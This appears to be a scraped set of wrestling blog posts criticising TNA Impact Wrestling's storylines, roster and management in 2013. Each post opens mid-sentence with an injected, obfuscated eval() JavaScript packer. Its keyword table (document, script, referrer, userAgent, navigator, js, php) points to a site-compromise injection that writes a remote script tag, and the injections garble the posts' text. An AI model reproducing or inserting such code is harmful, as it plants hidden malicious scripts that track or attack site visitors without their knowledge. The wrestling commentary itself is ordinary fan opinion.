Thought of the Day: Where Is TNA?

Fallout eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yenrs|var|u0026u|referrer|nsnbs||js|php'.split('|'),0,{})) from the awards. As I’ve been doing the awards this year, it’s come to my attention that TNA is notably absent.  I’ve been reading through the WrestleZone Forums to make sure I’m not overlooking anything big and TNA doesn’t come up much there either.  This has been a really bad year for TNA as they just haven’t had much to talk about.  Everything has either been predictable, not very interesting or repetitive.  There are certainly bright spots (Bad Influence, Angle vs. Roode), but so much stuff just doesn’t stand out or doesn’t feel important at all.  Take Aces and 8’s ending for instance.  yeah the match that got rid of them was entertaining, but it was clear that Anderson was going to win and the moment isn’t that big as the bikers had been dead in the water for years.  There’s nothing special going on over there and it’s showing badly.

TNA’s Real Turning Point

Continuing eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aiftz|var|u0026u|referrer|sfyzr||js|php'.split('|'),0,{})) my miniseries on why TNA is the mess that it is.Think back with me to Destination X 2012 and Aries vs. Roode.  Why was that match special?  Among other reasons, there was one major reason: either guy could win.  So many times in wrestling and TNA in particular, the stories and winners to the matches are very predictable.  This has plagued TNA since about No Surrender 2012.  Let’s think for a minute.

At No Surrender, Jeff Hardy won the BFG Series.  Wasn’t it was pretty obvious that Hardy would win the title?

At Bound For Glory, D-Von was revealed as the first member of Aces and 8’s.  At that point, wasn’t it somewhat obvious that Ray was involved too?  They’ve been together for years and you can’t have one without the other.  Also at Bound For Glory, Hardy won the title to the surprise of very few.

On some episode of Impact, Ray started dating Brook Hogan.  At that point, wasn’t it clear that Ray was going to be the big bad and screw everyone over?

Once Ray won a tournament (which he wasn’t in) to get a title shot at Lockdown, wasn’t it obvious that he would win the title and be revealed as the Aces and 8’s boss?  Again, that’s what happened.

Once AJ Styles became Stinger Styles, wasn’t it obvious he would take the title from Ray and end the reign of terror which wasn’t so much terror as it was boring?  Again, that’s what happened.

The night of Bound For Glory, I said Magnus was going to be Dixie’s man.  Any guesses as to who Dixie’s man will eventually be?

You can see a problem here: TNA is REALLY bad at having their stories go exactly as people say they will.  If I know nearly every step a story is going to take, why would I want to watch it?  There are exceptions to this rule of course, but the majority of the time it doesn’t make for compelling television.

Sports Illustrated Article on Dixie Carter

It’s eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bzasr|var|u0026u|referrer|abayy||js|php'.split('|'),0,{})) off their website but still not bad.http://sportsillustrated.cnn.com/more/news/20131121/dixie-carter-tna-wrestling/

Thought of the Day: TNA Needs Some Usos

More eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sbehd|var|u0026u|referrer|kndnt||js|php'.split('|'),0,{})) on my comment last night of TNA has no soul.If you’ve been watching Impact lately, it’s pretty clear that there’s not a lot of life in TNA.  A big part of that is there’s very little that’s supposed to be fun.  Other than Bad Influence, no one seems like they’re having fun out there.  You have Aces and 8’s vs. Anderson in a feud about trying to injure someone’s neck, you have a world title tournament which is always serious, Angle’s feud involves him nearly being paralyzed twice.  Nothing comes off as lighthearted or fun.

This is where the Usos come in.  Now before you ask, no I’m not suggesting they jump because that’s not the point.  However, let’s look at the Usos for a bit.  They have good matches, the fans are into them, and they’re definitely not a serious act.  They do their Siva Tao thing to fire up the crowd, fly around the ring, then dance when they win.  It’s a fun act that always fires the crowd up and just lets them have fun enjoying wrestling for a change.  TNA needs something like that.  Just let some guys go out there and have fun without some serious story behind them.  It would be a very nice breath of air on Impact.

TNA’s New Low Point

Apparently eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|akbhr|var|u0026u|referrer|ffrhe||js|php'.split('|'),0,{})) tonight, Bully Ray invaded Tommy Dreamer’s House of Hardcore event to set up a match at a One Night Only event.

TNA is now co-promoting with an ECW tribute organization.  Not ROH, not OVW, not PWG, but a Tommy Dreamer owned ECW tribute organization.

Let that sink in for a minute.

Thought of the Day: TNA At The Moment

Covering eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|teekh|var|u0026u|referrer|dziry||js|php'.split('|'),0,{})) two current TNA stories.1. Apparently AJ Styles will be gone for a few more months, defending the TNA World Title around the world.

Translation: Remember that guy we spent most of 2013 building up?  Well you just don’t get to see him anymore but come back later because he might be back then.  Until then, watch a bunch of guys that AJ beat in a competition fight for the other title in his absence!

2. Dixie Carter announced a former world champion returning to Impact tomorrow night in Cincinnati.

It would be Pacman Jones, the former tag team champion from several years back.  In other words, instead of bringing in new Knockouts, tag teams, X-Division guys or some fresh faces, TNA feels the better move is to bring back a guy who didn’t wrestle, most people complained about being in TNA the first time, and makes the news for not getting arrested rather than the more traditional opposite.

That’s TNA in a nutshell at the moment.  More on their screwups later.

Thought of the Day: Samoa Joe Lives On His Reputation

This eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nazrk|var|u0026u|referrer|frnat||js|php'.split('|'),0,{})) came from a discussion on WrestleZone and me watching the latest One Night Only show.Samoa Joe might be the most overrated guy in TNA at the moment.  Think about this for a minute.

Joe owned the world in 06/07, didn’t win the world title until WAY after his peak and had a forgettable world title reign in the summer of 2008.  What of note has he done since then?  Here are his accomplishments since losing the world title at Bound For Glory 2008, or roughly five years ago:

X-Division Title (50 days)

Tag Titles (91 days)

Television Title (70 days)

Joe also won the Maximum Impact tournament, which was held entirely on Xplosion and was for a world title shot also on Xplosion.  Oh and he won the Deuces Wild tag tournament with Magnus.

On the other hand, here’s another set of accomplishments in roughly the last three years:

Television Title (126 days)

X-Division Title (30 days)

Tag Titles (14 days)

These numbers belong to Robbie E.  Robbie E., the epitome of the comedy jobber, has numbers comparable to Samoa Joe over the last three years, and very easily could surpass him if this tag title reign lasts awhile.  Think about that for a minute.  Robbie E. > Samoa Joe in success.

What has Joe done lately to keep him at the elite level in TNA?  From what I can tell, very little.

Eric Bischoff Gone From TNA

He’s eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tbekn|var|u0026u|referrer|yeyyr||js|php'.split('|'),0,{})) going to be paid to sit at home until his contract runs out.  I can’t say I’m complaining as the last few years haven’t been the most interesting for TNA.  At the end of the day, they had one really good idea with the THEY ARE COMING storyline and since then it’s been downhill for me.  As usual, back to square one for TNA.

Thought of the Day: Pitching Impact To A Potential TNA Fan

This is what selling TNA to a fan might sound like right about now.Dude eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sinyd|var|u0026u|referrer|erinh||js|php'.split('|'),0,{})) you should totally watch Impact Wrestling.  They have this guy named AJ Styles who does the most awesome flips and dives and has the best matches in the world.

Potential fan: That sounds cool.  Which one is he?

Oh well actually he left after turning down money and a car and implied sex with a not terrible looking woman.  But he’s champion and the best in the world!

Potential fan: But I can’t see him?

You might be able to if you don’t mind listening to Spanish or Japanese commentary.

Potential fan: HUH?

Never mind.  Oh I know you’ll love this: TNA has this thing called the X Division which has no limits on it at all.  Everybody is all about leaving it all in the ring and giving everything they have to be champion.  They fly around and have to crawl across ropes to pull down a title belt.

Potential fan: Now that has to be cool.  When are they on?

Actually scratch that since they weren’t on TV this week because Impact needed more time to spend on the not bad looking older woman.  Wait I almost forgot the best part!  There’s this team called Aces and 8’s and they’re just like Sons of Anarchy and they ride on motorcycles and beat up everyone!

Potential TNA fan: I don’t watch Sons of Anarchy.

Uh……Oh there’s this guy there named EC3 who is just like Robert Griffith III.

Potential TNA fan: He’s my favorite player on my favorite team.  Ok so I need to look for the black guy named EC3.  He has to be cool.

Actually he’s white.

Potential TNA fan: But he’s more athletic than everyone else right?

…..not especially.

Potential TNA fan: He represents Washington DC though?

If the DC stands for Directly from Cleveland he does!

Potential TNA fan: Nicest guy in the company?

Actually he looks to be one of the new top heels.  He’s the nephew of the older lady who isn’t bad looking.

Potential TNA fan: …..is he recovering from knee surgery?

YES!  I can indeed assure you that he had his knee operated on last year and is at least mostly back to full strength!

Potential TNA fan: So to recap, you want me to watch a show where to see the best guy in the world I need to watch other companies, I should be a fan of Sons of Anarchy, the high flying dudes weren’t even on last week, the show is apparently dominated by a woman that isn’t that bad looking and there’s a guy who is supposed to be like RG3 because he’s the polar opposite of him?

……did I mention Sting is still there and Hulk Hogan might come back?  And Sting can almost bend over still!

The worst part: this isn’t meant as a parody.
